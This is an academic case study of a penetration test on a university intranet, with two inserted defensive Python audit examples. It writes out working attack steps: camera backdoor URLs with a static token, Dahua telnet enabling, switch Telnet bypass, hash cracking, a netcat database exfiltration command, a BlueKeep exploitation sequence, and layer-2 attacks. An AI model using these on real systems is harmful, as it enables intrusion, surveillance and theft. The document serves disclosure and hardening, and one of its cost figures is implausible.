2nd International Conference on Computational Sciences and Technologies, 17-19 December 2020 (INCCST’20), MUET Jamshoro
ISBN 978-969-23372-1-2
Case Study: Intranet Penetration Testing of MUET
Shameel Syed, Faheem Khuhawar, Khizra Arain, Talha Kaimkhani, Zohaib Syed, Hasan Sheikh, Shahroz Khan
Department of Telecommunication, Mehran University of Engineering and Technology, Jamshoro, Pakistan
Abstract—Every organisation, with its available resources, requires its network to be secure from any sort of internal or external threat. This requires implementation and proper assessment of overall security measures. In this paper, we highlight how an educational campus intra-network can be highly vulnerable due to improper configurations or inadequate security measures. Our investigation through penetration testing allowed us to gain access to more than 50% of the distribution and core switches from Cisco, IP cameras from Dahua and Hikvision, biometric systems from ZKTeco, MikroTik RouterOS, and PCs/servers having vulnerabilities like BlueKeep. A systematic procedure to perform the attacks is presented in this paper, along with recommendations to implement proper security measures.
Keywords—Network Security; Penetration Testing; Testing; Exploitation; Attacks
I. INTRODUCTION
If a vulnerability is exploited by an unauthorized individual to access a company’s network, its resources can be compromised. The objective of a penetration test is to address vulnerabilities before they can be exploited. Penetration testing is a comprehensive method of testing a complete, integrated, operational system consisting of hardware, software and people. There are three main types of penetration testing, namely black hat penetration testing, white hat penetration testing and grey hat penetration testing.
Black hat penetration testing scans the remote hosts for possible vulnerabilities with no prior knowledge of the target, analyzes the vulnerabilities and their possible risk, and finally reports them. White hat penetration testing is provided with significant knowledge of the target. It is a simulation of an attack by a penetration tester who has detailed knowledge of the network environment. Grey hat penetration testing, also called grey box analysis, is a strategy in which the tester has limited knowledge of the internal details of the network. The grey hat approach is used specifically when the threat is considered to be an inside job. We have used the grey hat approach in our research. Penetration testing has four steps to perform.
• Reconnaissance/ Information Gathering
• Scanning
• Exploitation
• Post exploitation
Network scanning is a procedure for identifying devices on a network by employing features in the network protocol to signal devices and wait for a response. Most network scanning is used in monitoring and management, but scanning can also be used to identify network elements or users for attacks. An exploit is a piece of software, a sequence of commands or a chunk of data that takes advantage of a bug or vulnerability to cause unintended behavior on target machines. Such unintended behaviors include gaining control of a system, allowing privilege escalation or Denial of Service (DoS) attacks. Most devices connected to the Internet these days are not maintained and monitored properly. Instead, these are devices that are often not understood as computers but are termed “things”, giving rise to the term “Internet of Things”.
II. LITERATURE REVIEW
A penetration test is defined as a controlled attempt at penetrating a network from outside in order to detect vulnerabilities [1]. In this age of continuously advancing technologies, every organization, whether it be a university, a hospital or a military organization, is network based. This makes work-related tasks more efficient and effective but also increases the risk of being targeted by a malicious threat, either for an agenda or for personal gain. This is where penetration testing is important. Offensive security techniques are used in order to discover possible flaws in the network. For an IoT company, it can be seen as an act of complementing the defensive security measures before IoT motes are deployed [2]. It is a basic instinct of a security expert to think like a criminal in order to fill the gaps from the criminals’ perspective. So, it is a basic necessity for the penetration tester to know as much as or more than what an attacker can know, in order to make the results meaningful [3].
Wireless connections are low cost and convenient for connecting network devices. The ease with which they provide connectivity is also a reason for attackers to target wireless networks. Therefore, authentication protocols have been made for keeping unauthorized access out of the network. The two most commonly heard-of encryption schemes for wireless networks are Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access (WPA). The WEP algorithm was made to secure wireless internet connections in 1997, but it was vulnerable on many levels [4]. So WPA was developed as a second encryption standard which solved many problems lying in WEP. The latest version of WPA is WPA2. WPA2 provides stronger encryption than the WPA rated standard [5]. Both give the choice of two security modes, i.e., TKIP and AES encryption modes. The WPA2-PSK protocol can be used in a wireless distribution system. For home users, WPA2-PSK (AES Pre-Shared Key) is used. Corporate security is based on 802.1X, the EAP authentication framework that uses a RADIUS server, with methods such as EAP-TLS, which provides a much stronger authentication system and secure key distribution [6]. The greatest attack that engraved its name recently is WannaCry. WannaCry is a type of ransomware; ransomware is a type of malware that takes full control of the targeted system and demands a ransom for the safe return of the functionality of the system. WannaCry is software that makes use of EternalBlue and DoublePulsar. It started on May 12, 2017. EternalBlue is a well-known vulnerability in the Server Message Block (SMB) protocol employed by Microsoft Windows on ports 445 and 139. Once the malware is injected into the machine, it searches for the backdoor. WannaCry malware spread to over 300,000 systems in over 150 countries [7]. There was only one agenda of WannaCry: to collect ransom. It froze or completely locked down the target systems by encrypting them and demanded about $300 to $600 to release the lock.
CCTV cameras, which are the very eyes of an organization and keep security in check, can also be exploited. A cyber-attack on a Russian bank gave hackers access to 24,000 CCTV cameras in 30 different countries. This attack led the bank to lose more than 31 million USD [8]. Recently, a new vulnerability was disclosed in Microsoft’s RDP service which is considered to be as dangerous as EternalBlue. This paper also illustrates the exploitation of and safety measures for this vulnerability.
According to the estimate provided by the US Computer Emergency Response Team (CERT), almost 40 percent of IT security breaches are perpetrated by people inside the company. Additionally, the FBI/CSI Risk Assessment implied that many enterprises’ ports are open, and that any laptop can plug into the network and gain access, as a common practice. The total loss of the companies surveyed was approximately over 130 million USD, with the average expenditure per employee being about 241 million USD per year. 28 percent of the employees stated they had no idea whether they were attacked and how many times they were attacked. Yet about 32 percent of employees said they were never attacked from the inside. This paper deals with the penetration test procedure for determining the security levels so as to highlight the possible vulnerabilities that could be exploited in the Campus Area Network (CAN) of Mehran University of Engineering and Technology (MUET), including the IP cameras, biometric systems, and switches deployed within the network. This paper explains various data link protocols that were compromised during the research. Although a lot of work has been done in the area of penetration testing, we have specifically followed standard penetration testing on the live network of Mehran University of Engineering and Technology using the grey hat approach.
III. METHODOLOGY
Network penetration testing has the following four steps.
A. Reconnaissance
Reconnaissance is the process of collecting information about the target without being discovered, and using that information to perform a detailed penetration test. Reconnaissance is the biggest phase any penetration tester goes through, to identify devices on the network and their interconnection. The generic topology of the campus area network, obtained through a survey and later verified, is shown in Figure 1.
Fig. 1: Network Diagram of Campus Area Network
To gain basic information about DHCP, DNS and the subnet IP address, the following command was used.
username@hostname:~$ ifconfig
It was found that the subnet IP changed from department to department, i.e., every department at MUET has a different subnet ID, and DHCP was part of it, whereas the local DNS information remained the same. ICMP (ping) messages were sent from one department to another, as a result of which it was realized that tagged information was being sent along with a VLAN ID. Using this approach, information about the VLANs of different departments was collected. Later, this information was verified after discovering misconfigured switches that allowed an unauthenticated bypass: if the first two or three sessions via the telnet protocol are kept open beforehand, the fourth session allows an attacker to enter the switch without being prompted for any password.
username@hostname:~$ telnet 172.16.X.X
This allowed the Cisco IOS shell to be reached, and eventually the configuration file could be read, through which the complete topology of MUET’s network can be discovered, i.e., how the core, aggregation, distribution, and access switches are interconnected with one another. Furthermore, additional information, such as ACL rules and the configuration of L2 protocols such as CDP, VTP, STP, and DTP, was also collected.
B. Scanning
The process of scanning identifies security weaknesses in the remote target network or local hosts. To achieve this, IP address information of live hosts and layer-2 devices was collected. Later, targeted hosts were scanned for open ports using a tool called nmap.
username@hostname:~$ nmap -T4 -A -v
By this approach, tables of hosts with IP addresses and their corresponding MAC addresses along with open ports were made. Because of VLAN restrictions, the scan was initially done on each VLAN separately. Later on, after the exploitation of the core switch, detailed information was retrieved quickly and without any exhaustive effort.
C. Exploitation
1) Switches: The switches with open Telnet ports were targeted, after a careful review of the scanning results. Upon attempting to access the switches, it was discovered that more than 50% of the switches used default credentials, irrespective of their vendors. Switches that had their default passwords changed were misconfigured, such as using vty 0 4, which allowed access to the switch after 5 simultaneous virtual connection sessions. Figure 2 shows a snapshot of accessing the core switch.
Fig. 2: Accessing Core Switch
It was discovered that “Cisco IOS Shell” was enabled, through which the configuration files of all of the core switches could be copied. From these configuration files, extensive information that helped in exploiting various L2 protocols was gathered. The password hashes of users having privilege level 15 and the password to enter the global configuration mode of the switch can also be retrieved from the configuration file; these were later cracked with the help of hashcat (the tool needs to be installed first on the PC, Linux or Windows).
This paper demonstrates the use of hashcat from Windows OS. Assuming that hashcat is installed in the C drive, the following command was used to brute-force the password, assuming that the password consisted of 6 characters, where crack.txt is the name of the file which stores the Cisco Type 5 hashes. The output of hashcat is shown in Figure 3.
C:\hashcat>hashcat64.exe -a 3 -m 500 crack.txt ?a?a?a?a?a?a
Switches with Cisco IOS are by default allowed to write data into flash storage; this was further exploited to write malicious code and trigger it to spread malware throughout the network. Figure 4 demonstrates the proof of writing and adding a text file into the core switch. All of the files in the flash storage of the switch can be seen, and the configuration file can be read using the cat command.
Fig. 3: Hashcat
Fig. 4: Writing data into the flash storage of core switch
Linksys switches were exploited through a vulnerability called “The Moon”. This vulnerability can be exploited through Metasploit or Routersploit. Figure 5 demonstrates how it is done.
Fig. 5: Exploitation of Linksys switches
Remote network connection is a basic necessity for the management of enterprise networking devices. Routers and switches are accessed on a daily basis for tasks such as creating and removing VLANs and adding or removing interfaces. Access to the router/switch is done via either Telnet or Secure Shell (SSH). Using Telnet is rather common even though it is insecure. It is highly recommended that SSH be used instead of Telnet.
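A configuration audit for the switch findings above (Telnet on the vty lines, vty lines that never prompt, crackable type 5 and reversible type 7 passwords) together with the DTP, CDP, VTP and STP settings the paper recommends in its later sections. This is an added example, not the paper’s tooling or a Cisco utility; both configurations are constructed and the hash values are placeholders.

```python
"""Audit a Cisco IOS running-config for the weaknesses this case study found
on the campus switches: Telnet on the vty lines, vty lines with no login,
weak password types, DTP negotiation left on, CDP on, and VTP version 2."""

# Constructed sample, not the MUET configuration. It reproduces the
# misconfigurations described in the paper (placeholders for hashes).
WEAK_CONFIG = """\
hostname CORE-SW
enable secret 5 $1$PLACEHOLDER$placeholderhash
username admin password 7 0PLACEHOLDER
vtp version 2
!
interface GigabitEthernet1/0/1
 switchport mode dynamic auto
!
interface GigabitEthernet1/0/24
 switchport mode trunk
!
line vty 0 4
 transport input telnet ssh
 login local
line vty 5 15
 no login
 transport input telnet
"""

# The same switch with the paper's recommendations applied (constructed).
# 'algorithm-type scrypt' is the typed form; IOS stores it as 'secret 9'.
HARDENED_CONFIG = """\
enable algorithm-type scrypt secret PLACEHOLDER
username admin privilege 15 algorithm-type scrypt secret PLACEHOLDER
no cdp run
vtp version 3
ip ssh version 2
!
interface GigabitEthernet1/0/1
 switchport mode access
 switchport nonegotiate
 spanning-tree bpduguard enable
!
interface GigabitEthernet1/0/24
 switchport mode trunk
 switchport nonegotiate
!
line vty 0 15
 transport input ssh
 login local
"""


def parse_blocks(config):
    """Split a config into (top-level statement, [indented sub-commands]) pairs."""
    blocks = []
    for raw in config.splitlines():
        if not raw.strip() or raw.startswith("!"):
            continue
        if raw[0].isspace() and blocks:
            blocks[-1][1].append(raw.strip())
        elif not raw[0].isspace():
            blocks.append((raw.strip(), []))
    return blocks


def audit_config(config):
    """Return (scope, finding) pairs; an empty list means no weakness found."""
    findings = []
    blocks = parse_blocks(config)
    # CDP runs unless 'no cdp run' is present; an enabled port leaks IOS version/platform
    cdp_global = "no cdp run" not in {h for h, _ in blocks}
    for header, sub in blocks:
        if header.startswith("enable secret 5 "):
            findings.append(("global", "type 5 (MD5-crypt) enable secret is crackable offline; use a type 8/9 secret"))
        if " password 7 " in header:
            findings.append(("global", f"type 7 password for '{header.split()[1]}' is trivially reversible"))
        if header in ("vtp version 1", "vtp version 2"):
            findings.append(("global", "VTP v1/v2 accepts a rogue server with a higher revision; use VTP version 3"))
        if header.startswith("interface "):
            name = header.split(maxsplit=1)[1]
            # no 'switchport mode' line means the Catalyst default, dynamic auto
            mode = next((s for s in sub if s.startswith("switchport mode ")), "switchport mode dynamic auto")
            if "dynamic" in mode:
                findings.append((name, "DTP negotiation on: switch spoofing can turn this port into a trunk"))
            elif "switchport nonegotiate" not in sub:
                findings.append((name, "add 'switchport nonegotiate' so the port sends no DTP frames"))
            if mode.endswith(" access") and "spanning-tree bpduguard enable" not in sub:
                findings.append((name, "access port accepts BPDUs (root role attack); enable BPDU guard"))
            if cdp_global and "no cdp enable" not in sub:
                findings.append((name, "CDP advertises IOS version and platform on this port"))
        if header.startswith("line vty"):
            transport = next((s for s in sub if s.startswith("transport input")), "transport input all")
            if "telnet" in transport or transport.endswith(" all"):
                findings.append((header, "Telnet permitted (cleartext credentials); use 'transport input ssh'"))
            if "no login" in sub:
                findings.append((header, "'no login': a session reaches the exec prompt without a password"))
    return findings


if __name__ == "__main__":
    for scope, text in audit_config(WEAK_CONFIG):
        print(f"{scope}: {text}")
    print("hardened findings:", audit_config(HARDENED_CONFIG))
```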
2) Routers: It was discovered that the currently deployed router on the campus was running MikroTik RouterOS v6.42.9. An easier approach was carried out in which a preinstalled tool called searchsploit was utilized in order to find the vulnerabilities of the vendor MikroTik.
Figure 6 shows that MikroTik RouterOS v6.42.9 is listed as vulnerable for the defined versions. To exploit, the following command was used.
cat /usr/share/exploitdb/exploits/hardware/remote/46444.txt
Furthermore, the DoS attack defined in the exploits found by Searchsploit can be performed on MikroTik RouterOS using the following command.
python /usr/share/exploitdb/exploits/hardware/dos/18817.py 172.16.X.X config 9
3) IP Cameras: Organizations pay no attention to security vulnerabilities before purchasing and deploying CCTV cameras. Our investigation led us to exploit IP cameras from different vendors; most of the vulnerabilities of these devices are well documented, yet they were still not patched. We demonstrate how easy it was to gain access to the CCTV system using a brute-force attack via a tool called Hydra. Figure 7 demonstrates how Hydra is used.
Fig. 6: Searching Exploits by Searchsploit
Fig. 7: Dictionary Attack on IP Cameras
From those IP cameras, the database was extracted, but the passwords were encrypted using the proprietary algorithm of the company. The password hashes were extracted from the database and those hashes were used to access cameras from Hikvision. This allowed direct access to the camera, suggesting a poor implementation by Hikvision and a vulnerability of these cameras.
Another downside of using IP cameras on the intranet is that the passwords have to be hashed offline, which means that the algorithm must be somewhere in the system. After exploring the camera, the algorithm was found to be in sofia.py. Figure 8 demonstrates how this algorithm converts “888888” to a hash.
Fig. 8: Hashing Algorithm
Afterwards, a script was written to perform a brute-force attack to find the passwords of the registered users, and thus access was gained on different cameras which were not accessible via Telnet. It was found that “Hikvision” and “Dahua” use the same algorithm to convert plain text into a hash. The database from some of the cameras was compromised due to the existence of a backdoor in the camera, using these different links on different cameras:
http://<IP>:<Port>/mnt/mtd/Config/Account1
http://<IP>:<Port>/mnt/mtd/Config/Password
http://<IP>:<Port>/current-config/Passowrd
After Dahua noticed that hackers had been accessing cameras with default usernames and passwords, they released a patch that disabled telnet access. However, disabling remote access turned out to be a much bigger obstacle for users accessing IP cameras than was thought, because if usernames and passwords were forgotten, there was no way to access the cameras. To cope with that situation, Dahua provided a script to access cameras through telnet.
http://<IP>:<Port>/cgi-bin/configManager.cgi?action=setConfig&Telnet.Enable=true
After entering the script, a username and password are requested. But before the password, the string “7ujMko0” has to be added. For example, if the username and password are “admin”, the password has to be provided as “7ujMko0admin”. Passwords recovered with the previous methods were utilized with this string, and it also let default credentials open the telnet door of various cameras.
In some Hikvision cameras, entering the following URL into the browser allows an attacker to bypass authentication.
http://<IP>:<Port>/Security/users?auth=YWRtaW46MTEK
Worse, by using this method, the configuration file of Hikvision cameras can also be downloaded.
http://<IP>:<Port>/System/configurationFile?auth=YWRtaW46MTEK
This configuration file contains usernames and passwords (in plain text) for all configured users. The files are encrypted, but the encryption is easily reversible because of the presence of a static encryption key which is derived from the password “abcdefg”.
http://<IP>:<Port>/onvif-http/snapshot?auth=YWRtaW46MTEK
The above URL allows the attacker to take a snapshot from the IP camera, as can be seen in Figure 9.
Fig. 9: Snapshot Taken by Entering Script
This vulnerability also allows an attacker to change the password of Hikvision IP cameras very easily, as demonstrated in Figure 10.
There is a protocol, ONVIF, which was enabled on the majority of the cameras and was left unprotected due to a lack of knowledge of this protocol. Through this protocol, the use of the following URL in software like VLC Media Player allows access to the IP cameras using default credentials.
rtsp://<IP>:<Port>/cam/realmonitor?channel=1&subtype=0&unicast=true&proto=Onvif
“ONVIF Device Manager” can be used to manage the cameras in which this protocol is enabled. This allows adding/deleting users, changing the movement of the camera, speaking into the camera, changing the DNS server, changing the NTP server and other features as well. A snapshot of using ONVIF to access IP cameras is shown in Figure 11.
Fig. 10: Software based on this vulnerability
Fig. 11: Accessing cameras using ONVIF
4) Bio-metric Systems: Biometric fingerprint systems are used throughout the campus for recording the attendance of faculty members, and in some organizations biometric systems are used as locks for doors. Penetration testing was done on two models of ZKTeco, uFace800/ID and iClock880-H/ID. The embedded Linux systems in these devices are ZEM220, ZEM600 and ZEM800.
The telnet door was enabled on these machines and the default passwords were not changed, due to which access was gained into the systems after brute-forcing with probable wordlists. Figure 12 demonstrates accessing the biometric system via telnet.
Fig. 12: Accessing biometric via Telnet
First, database files were searched for using the following command.
find / -name '*.db'
It searches all the files in the system having the extension .db, which denotes a database file. After navigating to that directory, a database file was transferred using the tool netcat. The command on the sending side (ZEM220) was:
nc 172.16.23.32 9999 < ZKDB.db
172.16.23.32 is the IP of the PC where the file was to be received, but port 9999 had to be opened on the receiving PC using the following command.
nc -l -p 9999 > ZKDB
Here, -l means that port 9999 is opened to listen for the remote connection. “sqlite” or any other suitable software can be used to view the transferred file.
After making changes, the .db file was uploaded to the system the same way it was downloaded, using the tool netcat.
UDP port 4370 of the ZK5000-ZK9000 allows anyone to connect to the system without any proper authentication. Custom commands can be created and sent to the device through UDP port 4370 to download information. This can be confirmed using the tool Scapy on Linux. Alternatively, proprietary software from this company is also available which uses this port to connect to the device without a password. Although other versions of this software can be used to exploit this vulnerability, it has been confirmed by employing the software “ZKTeco 5.0”, as shown in Figure 13.
Fig. 13: Snapshot of ZKTeco 5.0
This shows that one device has been connected without providing any password. The following actions can be performed with this software:
1) Add a user
2) Delete a user
3) Change privileges of users
4) Modify the attendance log sheet, i.e., change the time and nature of attendance
This database can be decrypted to extract the fingerprints of the users registered in the device; these extracted fingerprints can then be used against the user in various ways, e.g., impersonation, identity theft, etc.
5) Exploiting Vulnerabilities in an Operating System: In the networks of different organizations, there is a plethora of vulnerabilities to exploit, varying according to the users. Different vulnerabilities were discovered in the scanning phase which were exploited to gain access to various systems. One of the most common vulnerabilities used to access a system is EternalBlue, which can be exploited easily through the Metasploit framework. This paper focuses on the following two vulnerabilities.
Firstly, this paper demonstrates the exploitation of an old bug that has been present in Netatalk for a long time. Pea is a proof of concept which bypasses authentication to gain control of the execution flow of Netatalk, as shown in Figure 14. This vulnerability has been patched in 3.1.10. Further details can be found on the website of NIST by searching for CVE-2018-1160.
Fig. 14: Exploitation of Netatalk 3.1.10
Secondly, this paper explains the exploitation of a vulnerability which is a hot topic these days. BlueKeep (CVE-2019-0708) is a recently discovered vulnerability in the RDP service of Microsoft. This is a wormable vulnerability which can be considered as dangerous as EternalBlue. After being exploited, this vulnerability provides an attacker with complete access to the host system.
From the scanning phase, information was gathered to know which hosts are using Microsoft’s RDP service. The following text demonstrates further scanning with the Metasploit module, to evaluate how many of the hosts are vulnerable to the BlueKeep vulnerability.
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set RHOSTS 172.16.100.3 172.16.100.5 172.16.100.6 172.16.100.7 172.16.100.8 172.16.100.9 172.16.100.10 172.16.100.11 ...
RHOSTS => 172.16.100.3 172.16.100.5 172.16.100.6 172.16.100.7 172.16.100.8 172.16.100.9 172.16.100.10 172.16.100.11 ...
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > run
[*] 172.16.100.3:3389 - The target is not exploitable.
[*] 172.16.100.4:3389 - The target is not exploitable.
[*] Scanned 2 of 18 hosts (11% complete)
[+] 172.16.100.5:3389 - The target is vulnerable.
[*] 172.16.100.7:3389 - The target is not exploitable.
[*] Scanned 4 of 18 hosts (22% complete)
[+] 172.16.100.11:3389 - The target is vulnerable.
...
Since Metasploit had only recently launched the module for exploiting BlueKeep, the module had to be added manually.
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
mv cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
After that, open Metasploit and run the following command,
reload_all
then set RHOST to the target and launch the attack. After the attack was done, a meterpreter shell was provided through which complete access over the victim’s PC was gained, as can be seen in Figure 15.
Fig. 15: Exploiting Bluekeep
Other than exploiting devices as a whole, this work also focuses on exploiting the data-link layer protocols of the TCP/IP suite.
The main purpose of building the TCP/IP suite was to ensure that different layers work without knowledge of each other. Unfortunately, this means that if any one layer of the TCP/IP suite is attacked, the other layers will get no idea of the problem. In networking, layer 2 is a very weak link and prone to attacks. The following layer-2 protocols were compromised: ARP, VTP, STP, and DTP.
6) ARP Spoofing: ARP is used to discover the MAC address associated with a given IP address. A client can send an unsolicited reply, called a gratuitous ARP, and other hosts in the same subnet can save that information in their ARP tables. This way, anyone can claim to have any IP/MAC address, and this is how ARP attacks redirect traffic. There are certain countermeasures to ARP spoofing attacks, such as using the DHCP snooping binding table, in which all ARP packets must match the binding table entries or else they are discarded. This is done when dynamic ARP inspection is enabled. In the network under consideration, DHCP snooping is enabled, but there is a proxy server deployed in the network which authenticates each time a request is sent. Since the proxy server uses plain HTTP, poisoning the whole VLAN allows the usernames and passwords of clients to be retrieved. The MITMf v0.9.8 tool is used to demonstrate the procedure, as shown in Figure 16. The example demonstrates ARP poisoning by setting the gateway address and the target range.
Fig. 16: ARP Spoofing using MITMF
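The dynamic ARP inspection check described above, as an added example that is not part of the paper: ARP frames from untrusted ports are matched against a DHCP snooping binding table, with the source-MAC validation and per-port rate limit that IOS DAI also offers. All addresses, port names, the binding table and the frames are constructed.

```python
"""Dynamic ARP inspection (DAI) decision logic: every ARP frame from an
untrusted port must match the DHCP snooping binding table, as the paper
describes, plus the source-MAC check and per-port rate limit IOS offers.
Added example run over constructed frames; no real campus addresses."""
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_address


@dataclass(frozen=True)
class ArpFrame:
    vlan: int
    port: str        # ingress switch port
    eth_src: str     # Ethernet header source MAC
    opcode: int      # 1 = request, 2 = reply
    sender_mac: str  # ARP sender hardware address
    sender_ip: str
    target_ip: str


# Constructed DHCP snooping binding table: (vlan, ip) -> (mac, port)
BINDINGS = {
    (10, "172.16.10.21"): ("aa:bb:cc:00:00:21", "Gi1/0/21"),
    (10, "172.16.10.22"): ("aa:bb:cc:00:00:22", "Gi1/0/22"),
}
# The gateway has a static address, so it gets a static (ARP-ACL style) entry
STATIC = {(10, "172.16.10.1"): ("aa:bb:cc:00:00:01", None)}
TRUSTED_PORTS = {"Gi1/0/24"}  # uplink towards the distribution switch
RATE_LIMIT_PPS = 15           # IOS default for untrusted ports


class ArpInspector:
    def __init__(self, bindings, trusted, static=None, limit=RATE_LIMIT_PPS):
        self.bindings = {**bindings, **(static or {})}
        self.trusted = set(trusted)
        self.limit = limit
        self.seen = defaultdict(int)  # (port, whole second) -> frames
        self.errdisabled = set()

    def inspect(self, f, now):
        """Return 'permit' or 'drop: <reason>' for one frame at time `now`."""
        if f.port in self.errdisabled:
            return "drop: port err-disabled"
        if f.port in self.trusted:
            return "permit"  # trusted ports bypass inspection entirely
        key = (f.port, int(now))
        self.seen[key] += 1
        if self.seen[key] > self.limit:
            self.errdisabled.add(f.port)
            return "drop: rate limit exceeded, port err-disabled"
        if f.eth_src.lower() != f.sender_mac.lower():
            return "drop: Ethernet source differs from ARP sender MAC"
        ip = ip_address(f.sender_ip)
        if ip.is_unspecified or ip.is_multicast or ip.packed == b"\xff\xff\xff\xff":
            return "drop: invalid sender IP"
        bound = self.bindings.get((f.vlan, f.sender_ip))
        if bound is None:
            return "drop: no binding for sender IP"
        mac, port = bound
        if mac.lower() != f.sender_mac.lower() or (port and port != f.port):
            return "drop: sender IP/MAC does not match binding table"
        return "permit"


def run_sample():
    """Feed constructed frames through the inspector; return verdicts and err-disabled ports."""
    dai = ArpInspector(BINDINGS, TRUSTED_PORTS, STATIC)
    frames = [
        # ordinary request from a DHCP client on its own port
        ArpFrame(10, "Gi1/0/21", "aa:bb:cc:00:00:21", 1, "aa:bb:cc:00:00:21", "172.16.10.21", "172.16.10.1"),
        # gratuitous reply from port 23 claiming the gateway IP (the poisoning case above)
        ArpFrame(10, "Gi1/0/23", "aa:bb:cc:00:00:23", 2, "aa:bb:cc:00:00:23", "172.16.10.1", "172.16.10.1"),
        # the real gateway answering over the trusted uplink
        ArpFrame(10, "Gi1/0/24", "aa:bb:cc:00:00:01", 2, "aa:bb:cc:00:00:01", "172.16.10.1", "172.16.10.21"),
        # forged ARP sender MAC, but the Ethernet header still carries the real source
        ArpFrame(10, "Gi1/0/23", "aa:bb:cc:00:00:23", 2, "aa:bb:cc:00:00:01", "172.16.10.1", "172.16.10.21"),
    ]
    verdicts = [dai.inspect(f, now=1000.0) for f in frames]
    # a burst of gratuitous ARPs from the same port trips the per-port rate limit
    flood = frames[1]
    verdicts += [dai.inspect(flood, now=1001.0) for _ in range(RATE_LIMIT_PPS + 1)]
    return verdicts, sorted(dai.errdisabled)
```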
7) DTP Attack: On a switch, a port is configured in one of two ways: either as an access port or as a dynamic port. When a host is connected to a switch, an access port is used. With VLAN implementation, each access port is assigned to only one VLAN. On the contrary, a trunk port allows the traffic of multiple VLANs to pass through. A trunk port can be configured via a Cisco proprietary protocol called Dynamic Trunking Protocol (DTP). DTP automates the IEEE 802.1Q/ISL trunk configuration. It does not operate on routers. Synchronization of the trunking mode on end links is done by DTP. The DTP state on a trunking port can be set to “Auto”, “On”, “Off”, “Desirable”, or “Nonegotiate”.
In a switch spoofing attack, the attacker impersonates a switch in order to trick a legitimate switch into creating a trunk link between them. As already mentioned, packets of any VLAN are allowed to pass through the trunk link. Upon establishment of the link, traffic from any VLAN can be accessed by the attacker. The chance of success of this exploit depends solely on whether the legitimate switch is configured as “Dynamic Desirable”, “Dynamic Auto” or “Trunk mode”. Since the switches under consideration were configured as “Auto”, a switch spoofing attack was performed using the tool Yersinia v0.8.2, as shown in Figure 17, and thus a trunk link was formed.
Fig. 17: DTP attack using Yersinia
It can be clearly seen that an access port was assigned and then it turned into a trunk link after a successful DTP attack. This attack also provides a way for a VLAN hopping (double encapsulation) attack. This attack can be prevented by manually assigning each port as an access or trunk port. Further security measures include using a VLAN other than the default VLAN as the native VLAN.
8) VTP Attack: Switches are added to a VTP domain in order to use VTP. This VTP domain is defined on a VTP server, and later on clients and transparent devices as well. Whenever a new VLAN is added/created on a VTP server, the VTP server will automatically distribute this information among all the switches present in the VTP domain. All the switches (except the VTP server) are defined as client switches, and their task is to listen to the changes regarding VLANs from the VTP server. Switches that are configured as transparent, without altering their VLAN assignments, will simply forward the VTP information. This is really useful when there are a lot of switches involved in the network, since all VLAN information can simply be altered from one place and automatically be changed through the VTP server. On the other hand, there is a risk that an attacker could exploit that usefulness by creating a rogue VTP server and gain complete control over the VTP domain’s VLANs. To remedy that, VTP implements MD5-based authentication in the VTP frames. In MD5 authentication, the VTP server has a password for authenticating the VTP domain switches; without that password, switches will not accept VTP information. The password is sent as an MD5 hash. This hash is then verified and used by the client switch. There are mainly two facts to consider when injecting VTP frames: the port should be turned into a trunk by the attacker (via a DTP attack), and the VTP configuration revision number should be higher than that of the previous VTP advertisements so that the update is reflected. By adding or deleting VLANs via a rogue VTP server, a VTP attack is done.
Fig. 18: VTP Information
A rogue VTP server can be made on any switch by increasing the revision number above the previous one (the previous revision number was known by viewing the VTP information in the core switch, as shown in Figure 18). After sending the command to change the VLAN configuration via the rogue VTP server, the MD5 hash was sent with that frame, and the switches accepted that malicious frame without question since the hash was authenticated. This was done using the tool Yersinia. It is important to know that exploitation of the MD5 hash was possible because the switches were configured with VTP Version 2. The remedy is to implement VTP Version 3. VTPv3 uses a status made up of primary and secondary VTP servers. Primary status is used only when there is a need to make changes. Other switches are secondary by default, which secures the network from this attack.
9) CDP Attack: The Cisco Discovery Protocol (CDP) is another proprietary protocol of Cisco, used by all devices by default. Directly connected devices are discovered using CDP, to simplify their configuration and connectivity. CDP messages are not encrypted. CDP information is broadcast periodically, updating each device’s CDP database. Routers cannot propagate it because CDP is a layer-2 protocol. Information about network devices such as software version, IP address, capabilities, platform, interfaces and native VLAN is gathered in CDP. Ultimately, the whole network’s topology could be determined using CDP, and if it gets into an attacker’s hands, this information could be used to exploit the network in many ways, mainly in the form of a Denial of Service (DoS) attack. An attacker can get CDP information via Wireshark or another network analyzer tool by sniffing the broadcast messages sent by CDP. For example, the attacker may get to know the Cisco IOS version of the device, as shown in Figure 19; this information is enough to search for exploits in that particular version. The attacker can also send malicious or bogus CDP packets to the directly connected Cisco devices, which can cause the switch to utilize its CPU to a maximum of 100%.
CDP is a useful protocol when documentation of a network is being made, and in most cases CDP is enabled on every switch and port in the network.
Fig. 19: CDP
10) STP Attack: Spanning Tree Protocol (STP) is used to prevent loops from forming in a layer-2 network of switches or bridges that has multiple paths for redundancy. Switches are made aware of each other and of the bandwidths of the links between them. The switches can then select a path that is both loop-free and of the maximum possible bandwidth in the network. The choice of link is based on the STP path cost. There is a reference point that controls STP, called the Root Bridge. The root of the STP is selected from among the switches via an election process. All traffic goes through the root bridge. After the election of the root bridge, a root port is elected that has the shortest STP path cost to the root bridge. After that, designated ports are selected for each segment of the network. All STP attacks differ in which one or more fields of the BPDU frames are modified. After sniffing existing legitimate BPDUs and taking their settings into account, the most dangerous attack type would be presenting a machine under your control as the Root Bridge, so that all the traffic in the STP topology goes through the attacker.
STP BPDUs should not propagate through access ports, but such BPDUs were accepted due to misconfiguration. Knowing the bridge priority from the reconnaissance phase (via the core switch), the bridge priority of a switch chosen from the network was changed to be lower than that of the root switch, making that switch the root bridge and allowing all the data to be sniffed. The attack described above (called the root role attack) can be thwarted by Root Guard and BPDU Guard, which were not enabled here. Secondly, an STP DoS attack was also performed by sending thousands of packets per second with the help of Yersinia. The switch processed so many configuration BPDU packets, which kept changing the root bridge within the STP topology, that STP was left in confusion. Thirdly, another DoS attack was performed in which TCN BPDUs were sent to the root bridge, which caused the STP topology to change continuously. BPDU filtering can be used to mitigate both of the DoS attacks mentioned above.
11) DHCP Starvation: The DHCP protocol is an integral component whose function is the configuration of client machines with IP addresses and other information such as subnet mask, DNS address and default gateway.
